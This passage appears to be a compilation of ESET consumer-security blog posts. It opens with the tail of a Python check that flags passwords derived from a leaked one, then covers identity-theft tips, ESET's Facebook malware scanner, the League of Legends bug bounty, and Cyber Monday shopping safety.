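def is_trivially_derived(leaked: str, proposed: str) -> bool:
    """True when the proposed password is the leaked one or a cheap mutation of it."""
    return proposed == leaked or proposed in derived_candidates(leaked)


if __name__ == "__main__":
    pairs = [("Summer2014", "Summer2015"), ("welcome1", "Welcome2!"),
             ("Password1", "P@$$w0rd1"), ("welcome1", "correct horse battery staple")]
    for old, new in pairs:
        verdict = "cracker gets it" if is_trivially_derived(old, new) else "not derived"
        print(f"{old!r} -> {new!r}: {verdict}")
```

A few thousand candidates per leaked password is nothing for an offline attack against a stolen hash database, which is the situation the article's "if your password leaks" warning describes; a genuinely new password shares no stem with the old one.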

4. If someone calls you, it’s THEIR job to prove who they are

phone scams

Common identity theft scams often rely on you handing over the information willingly – in response to a call or email from your bank or another institution.

In these situations, remember that banks do not usually operate this way. It’s your right to hang up if you are suspicious that a call is an identity theft scam.

Most importantly of all, it is THEIR job to prove that they are calling from a bank, not your job to prove who you are. Emergency fraud alerts from a bank will not require you to hand over personally identifying information – if you are being asked for it, that’s a clear sign that the fraud has yet to happen, and you are facilitating it.

5. Safeguard personal information in your home

safeguard information in your home

Many of us will invite tradesmen and cleaners into our homes without a second thought, and check only for outright thefts of cash or jewellery – despite the fact that personally identifying information can be just as valuable if not more so.

If you invite people you do not know into your home, make sure that documents such as tax returns, credit card details and government identity certificates are kept under lock and key.

If your home has been burgled, be alert for identity theft frauds following steps one and two above.

6. Be wary of Facebook quizzes

Be wary of Facebook quizzes

It pays to be wary of oversharing on social networks generally – but anyone security conscious should also pay attention to the sort of content they click on.

Some people thought that Facebook quizzes might have peaked when Slate made the spoof, ‘What kind of Buzzfeed quiz are you?’ But some of these quizzes are not just boring – they’re risky.

As ESET Senior Research Fellow David Harley notes here, some of these quizzes appear to harvest data which might be extremely useful for criminals – and some quiz companies have previously been caught selling data to advertisers such as drug companies from health-related quizzes.

The same applies doubly to any raffle, money-off offer or freebie offered through Facebook – if you find yourself handing out the same data you’d enter when applying for a credit card, do not hit Enter.

Leave the page, close your browser, and walk away.

ESET and Facebook offer ‘ESET Online Scanner’ for all Facebook users for free


ESET Online Scanner for Facebook is going live today and will be available to all Facebook users. ESET’s solution will help users scan for and identify malware posted to their Facebook account after logging in from an infected computer, and safely remove it.

“Our goal is to offer our users the right technology to improve their experience of our services and better protect their devices. ESET Online Scanner for Facebook will significantly decrease the number of malicious links from among the trillions of clicks that take place every day on Facebook,” said Chetan Gowda at Facebook.


ESET Online Scanner for Facebook was designed to detect and clean infected computers of Facebook users. “ESET is pleased to offer its services to Facebook users all over the world. Signature low system footprint and ESET’s top rated detection technology used in ESET Online Scanner guarantee effective and easy detection for free,” said Ignacio Sbampato, Chief Sales and Marketing Officer at ESET.

When a Facebook user logs into their account, Facebook checks for signs of any suspicious behavior – like sending spam messages or infected links to people’s friends. If this kind of activity is detected, Facebook displays a message offering the user a chance to use ESET Online Scanner for Facebook – utilised directly within Facebook without a fee or interruption.

If users download and run the scanner, they can continue to use Facebook and other services on their device without any loss of performance. When the scan is complete, they will receive a notification through Facebook and also be able to review the results of the scan. Cleanup begins after the scan is complete if any malware is discovered.

This service for Facebook is based on the free product ESET Online Scanner, which protects millions of users online.

Play League of Legends? Wanna earn money?

Riot Games has paid out over $100,000 to security researchers probing the game for exploits, hacks and bugs under its League of Legends bug bounty scheme, Security Week reports.

The HackerOne platform, on which the League of Legends bug bounty program is based, has been open since April 2013, but only to a handful of security researchers. Despite this, those researchers have since found a total of 75 exploits, which Riot Games has duly patched.

Bugs squashed have included client crash exploits, vision-related flaws and exploits where players could potentially be impersonated on official forums.

The latter of these was how Riot Games came to set up the bug hunting program in the first place. An Australian researcher found a vulnerability that would have allowed him to impersonate other players on the forums – there was no account hijacking involved, but it could have been used for phishing. Because at the time the company had no official security channels in place, the report was sent via the general enquiries email account, which meant it took around a week to reach the people who needed to fix it.

The official Riot Blog post on its League of Legends bug bounty describes this point as “admitting we had a problem.”

“If we’re not listening, it can frustrate researchers with good intentions and lead them to post their exploits online in order to get our attention. That’s not great for the researcher and could cause confusion and pain for players,” the company explained.

Now, the company intends to open the program to “all security researchers and enthusiasts” though they’re not quite ready yet. “Before we can expand the program, we need to get aligned on a foundational workflow that allows our security team to efficiently handle every report from the field and turn them into bugs that development teams will own,” the company explained. In the meantime, anyone with an exploit to report can contact the security team directly via email.

Bug bounty schemes are proving increasingly popular, with the likes of Pinterest, Twitter, Blackphone, Microsoft and Google offering incentives for exploits researchers find in their travels.

by Alan Martin, ESET

Cyber Monday – 12 tips to help you shop safely online

‘Cyber Monday’ is rapidly becoming a boom industry for cybercriminals, with reports of fraud having leapt 31% in 2013, according to police statistics quoted by The Guardian.

With social media helping to whip up the frenzy around the Black Friday and Cyber Monday sales, and retailers hyping bargains via Facebook, Twitter and email, it’s all too easy to click on the wrong link.

Tech Week predicts that Cyber Monday sales via social media will increase 21% over last year.

Technology might evolve, but cyber gangs rely on tried-and-tested tactics. With a bit of care and attention, it’s easy to sort the genuine bargains from the too-good-to-be-true fakes.

It’s also easy to put a few precautions in place – so that if you ARE caught out, you won’t lose out in the long run.

The best advice of all, though, is simply to stay alert – watch your bank statements, from now right until the end of January, and if you see anything odd, call your bank immediately.

Cyber Monday: How to shop safely

  • Make sure your bank has an up-to-date telephone number for you: this will allow them to get in touch rapidly if they notice suspicious transactions. This can help both to speed through genuine transactions – and to stop criminals in their tracks if your card number is being misused.
  • Be ultra-wary of ‘bargains’ and social-media offers around iPhones, Samsung phones, games consoles and iPads on Cyber Monday. The UK organisation Get Safe Online says that these are the items most commonly involved in fraudulent sales or auctions, along with fashion items such as Ugg boots.
  • Buy items using credit cards, not debit cards – credit cards usually offer protection against fraud, whereas many debit cards do not.
  • Where possible, ensure that your cards are enrolled in schemes such as Verified by Visa or Mastercard SecureCode, which offer an additional layer of protection when buying online.
  • Check delivery and returns policies where you can – one of the most common frauds during the holiday season is to deliver fake or faulty goods, and then refuse to refund the money.
  • Shop on a PC with anti-malware protection if you can; if you are shopping on a mobile device, use mobile security software. Last year saw mobile sales leap to around 20% of holiday-season shopping, according to a We Live Security report – and rise 187% year-on-year according to GigaOM. Good mobile AV software will alert you if you’re being directed to a bogus site.
  • If you are using a PC to buy, spring clean before you shop – update your browser, plug-ins, OS, and flush with good AV software.
  • The browser bar is your friend: check the spelling of any site you’re shopping from, and check to see that there’s a ‘lock’ symbol and HTTPS to show you’re secure when you’re about to buy. If it’s not there, leave.
  • Auction sites are rife with fraud on Cyber Monday, so be extra wary around expensive items. Always choose a payment method approved by the site and covered by its insurance – and never pay the seller directly.
  • Don’t click on a link your friend sends you, or you see shared on Facebook – no matter how good the bargain is. That’s just asking to be sent to a fake site. Instead, go in via the front page, and find the item from there – if it is a sale item the retailer is pushing, it will be easy to find anyway.
  • Don’t overshare. Many frauds rely on you handing over information, thinking you’re making a purchase – then the fraudster uses your information to drain funds from your account. If you’re asked for ‘extra’ info, such as ID or a phone number, be wary.
  • If a bargain appears on a store you’ve never heard of, step back and use a search engine to find reviews of the store, and see how long it’s been around for. If information seems to be lacking, don’t buy.

Follow these tips, and you can be sure that you’ll be bringing home bargains this holiday season – rather than handing out valuable information (or money) to cybercriminals.

Author Rob Waugh, ESET